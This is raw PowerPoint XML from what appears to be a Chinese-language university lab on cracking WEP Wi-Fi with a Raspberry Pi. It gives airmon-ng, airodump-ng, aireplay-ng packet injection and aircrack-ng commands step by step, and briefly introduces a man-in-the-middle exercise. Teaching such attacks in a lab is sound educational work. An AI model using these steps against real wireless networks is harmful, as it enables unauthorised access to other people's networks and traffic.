              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>-nameserver 8.8.8.8 8.8.4.4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753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C8C1F-C939-49D9-8FFF-5481D16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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WIN 10 RNDIS IP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A6320-8E53-4814-ADBD-194B94E4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這邊要將電腦與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>設定在同一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>LAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>右鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>→設定→網路及網際網路→變更介面卡選項→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>USB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Ethernet/RNDIS Gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>右鍵內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> →內容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>IP: 192.168.7.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>Mask: 255.255.255.0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285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A0730E-02BB-4FCB-85E2-472CBB29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設定監聽模式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9D2768-1DCF-45FB-A90D-FA7DC8A6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將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>raspberry pi(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>TypeC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>與電腦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>TypeA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>相連，以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>USB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方式做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>ssh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en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng check kill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng start &lt;interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注意：這邊要用監聽的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>需支援</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>monitor mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，可用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>iw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>指令查詢。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>若出現</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>disable avahi-daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> service avahi-daemon stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 停用服務</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>請記得更改後的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>名稱，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>wlan0mon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192874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BE1EE-F8DF-418F-8134-7D19F3D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破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WEP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C96AE7-DBA2-4178-8558-FB895CA5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探測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>AP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>並擷取封包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airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>-ng)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>-ng &lt;interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>取得指定頻道封包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>-ng -c &lt;channel&gt; -w &lt;file name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>XX:XX:XX:XX:XX:XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>&lt;interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>擷取目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>AP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的工作頻道</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>-w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>保存擷取封包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檔名設定為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zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>學號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>但產生的文件是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>學號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>&gt;-01.cap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400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4CA4AF7-D63F-4AB8-BD04-E4456CE4F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0" y="3949706"/>
            <a:ext cx="8620491" cy="25788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FEC132-423D-49DF-BEF1-40057A1E5E74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2277307" y="5240908"/>
            <a:ext cx="4032448" cy="725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02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39A230-B072-4312-884E-E2106541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E0E9B9-2B54-48AD-A743-BBBBB07F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帶同學動手實作，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Raspberry Pi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>實作針對物聯網與無線網路認證協定之攻擊。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目標一：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>協定密碼</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>目標二：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Man-in-the-middle attack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7449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BE1EE-F8DF-418F-8134-7D19F3D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破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WEP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C96AE7-DBA2-4178-8558-FB895CA5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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入封包，建立定期重新連接延遲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>以每</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>秒重新連接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-ng -1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>X  -e &lt;ESSID&gt; &lt;interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>抓取合法使用者的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>要求，並且仿造重送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-ng -3 -e &lt; ESSID &gt; &lt;interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>約</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>分鐘後，可以嘗試破解密碼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破解密碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-ng &lt;file name&gt;-01.cap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>檢核點：需將破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>解密碼畫面截圖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DD3ABBD-310D-44C9-B250-B332877D2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82" y="52178"/>
            <a:ext cx="6897063" cy="150516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E414CFC-59F2-4E09-B5D3-47552F26F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4562" r="40760" b="16988"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500284" y="3429000"/>
            <a:ext cx="4824536" cy="25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9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21ADE9-DDF9-41B0-9F10-9E8E2786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復原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D818D5-78FE-406D-BEA5-0B0FB79D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/>
              <a:t>關閉監聽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>-ng stop &lt;interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>復原 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Network Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>service networking restart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>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/network/interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>重新開機</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> reboot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347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1D9D97-25A0-4475-8A6D-13C55BAB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目標二：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Man-in-the-middle attack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29818D1-7725-4E24-8877-3D3A5FBD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089400"/>
            <a:ext cx="1800200" cy="18002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72CFF3C-0F02-4395-8B11-DF7FCD05D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62" y="3353472"/>
            <a:ext cx="1872208" cy="14434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34F931D-B0F9-4842-AC39-5F83E26C6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6" y="3756074"/>
            <a:ext cx="2304256" cy="6382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1E8C158-D1D7-4815-BF65-F5D5A62D4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50768"/>
            <a:ext cx="643975" cy="531866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E42FDA7-F958-4159-9C3D-CF735B1CC44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6979574" y="1916701"/>
            <a:ext cx="2212770" cy="2072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3079E99-ED5C-4C9F-9A20-FFD0FBCC8350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6369870" y="3989500"/>
            <a:ext cx="2822474" cy="85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A8EA16E-9414-4C5F-AEEC-44EF44D7D8A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2981382" y="4075208"/>
            <a:ext cx="151628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1EE33A40-0341-4827-85D6-6F40BCB10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24" y1="28191" x2="30224" y2="28191"/>
                        <a14:foregroundMark x1="24254" y1="17021" x2="24254" y2="1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924996"/>
            <a:ext cx="2552700" cy="1790700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="接點: 肘形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{784CA48E-559B-42C6-9165-5D8A93FBF474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2205509" y="4018087"/>
            <a:ext cx="1426004" cy="21785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接點: 肘形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BD3DC6-5B33-479B-9AF5-C4C505E0E549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="3"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6560468" y="4889600"/>
            <a:ext cx="3531976" cy="9307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乘號 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62338A5A-C4DB-451B-A686-1E7028006E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7632109" y="2506893"/>
            <a:ext cx="685800" cy="66821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C081A3C-62D0-4AF6-9FA5-C59A0A19B108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4547828" y="4790593"/>
            <a:ext cx="147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webserver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352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CF187-70EE-4B57-94C6-E244CCAD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C712FB-87FA-404F-BFAB-91F6DFB6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/>
              <a:t>新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>空白檔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>新增新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>wpa_supplicant.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，建議以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>nodepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>編輯</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
